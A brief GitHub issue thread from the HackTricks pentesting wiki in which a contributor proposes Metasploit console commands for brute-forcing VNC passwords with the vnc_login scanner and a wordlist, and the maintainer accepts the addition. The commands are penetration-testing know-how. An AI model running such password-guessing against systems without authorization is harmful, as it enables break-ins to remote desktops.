### ISSUE TITLE
Add metasploit brute force to VNC - pentesting

### ISSUE THREAD

**Issue by garthoid** [carlospolop/hacktricks#288]
pentesting/pentesting-vnc.md

use auxiliary/scanner/vnc/vnc_login

set RHOSTS <target>
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst

**Comment by carlospolop** [comment]
Added, thanks! Next time feel free to send a PR an appear as contributor of hacktricks!
